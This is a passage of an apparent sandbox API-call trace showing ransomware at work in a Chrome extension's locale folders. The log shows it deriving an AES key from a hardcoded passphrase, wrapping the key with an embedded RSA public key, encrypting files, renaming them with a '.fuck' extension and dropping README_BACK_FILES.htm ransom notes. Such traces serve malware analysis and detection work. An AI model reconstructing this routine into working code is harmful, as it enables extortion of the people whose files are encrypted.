lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json"), bFailIfExists=0) returned 1 [0256.812] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json", dwFileAttributes=0x0) returned 1 [0256.813] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.gsg")) returned 1 [0256.814] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\messages.json.fuck")) returned 1 [0256.815] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.815] CryptDestroyKey (hKey=0x2e19428) returned 1 [0256.815] CryptReleaseContext (hProv=0x2e134c0, dwFlags=0x0) returned 1 [0256.815] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.815] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.815] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\readme_back_files.htm")) returned 0xffffffff [0256.816] AreFileApisANSI () returned 1 [0256.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.816] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.816] GetFileType (hFile=0x5d50) returned 0x1 [0256.816] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.818] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.818] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.818] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.818] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.818] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.818] GetLastError () returned 0x0 [0256.818] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json")) returned 0x20 [0256.819] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0256.819] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.820] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.821] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.821] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.823] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.823] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.823] CryptHashData (hHash=0x2e18128, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.823] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19528) returned 1 [0256.823] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.823] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.823] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e134c0) returned 1 [0256.824] CryptImportPublicKeyInfo (in: hCryptProv=0x2e134c0, dwCertEncodingType=0x1, pInfo=0x2e2af40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2af70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2af78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19228) returned 1 [0256.824] CryptEncrypt (in: hKey=0x2e19228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.824] CryptEncrypt (in: hKey=0x2e19228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13a10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13a10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.824] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e13a10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13a10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.826] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xcf, lpOverlapped=0x0) returned 1 [0256.827] CryptEncrypt (in: hKey=0x2e19528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xcf, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0256.827] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0256.827] CloseHandle (hObject=0x5d5c) returned 1 [0256.827] CloseHandle (hObject=0x5d60) returned 1 [0256.827] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0256.831] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0256.831] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.gsg")) returned 1 [0256.832] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\messages.json.fuck")) returned 1 [0256.834] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.834] CryptDestroyKey (hKey=0x2e19528) returned 1 [0256.834] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.834] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.834] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.834] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0256.834] AreFileApisANSI () returned 1 [0256.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.834] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.835] GetFileType (hFile=0x5d50) returned 0x1 [0256.835] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.836] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.836] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.837] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.837] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.837] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.837] GetLastError () returned 0x0 [0256.837] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json")) returned 0x20 [0256.837] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0256.838] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.838] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.840] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.840] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.842] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.842] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.842] CryptHashData (hHash=0x2e18128, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.842] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19328) returned 1 [0256.843] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.843] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.843] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13b20) returned 1 [0256.843] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13b20, dwCertEncodingType=0x1, pInfo=0x2e2b4f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b520*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b528*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19528) returned 1 [0256.843] CryptEncrypt (in: hKey=0x2e19528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.843] CryptEncrypt (in: hKey=0x2e19528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13f60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13f60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.843] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e13f60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13f60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.844] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xad, lpOverlapped=0x0) returned 1 [0256.845] CryptEncrypt (in: hKey=0x2e19328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xad, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0256.845] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0256.845] CloseHandle (hObject=0x5d60) returned 1 [0256.845] CloseHandle (hObject=0x5d5c) returned 1 [0256.845] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0256.848] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0256.849] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.gsg")) returned 1 [0256.850] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\messages.json.fuck")) returned 1 [0256.853] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.853] CryptDestroyKey (hKey=0x2e19328) returned 1 [0256.853] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.853] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.853] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.853] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0256.853] AreFileApisANSI () returned 1 [0256.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.853] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.854] GetFileType (hFile=0x5d50) returned 0x1 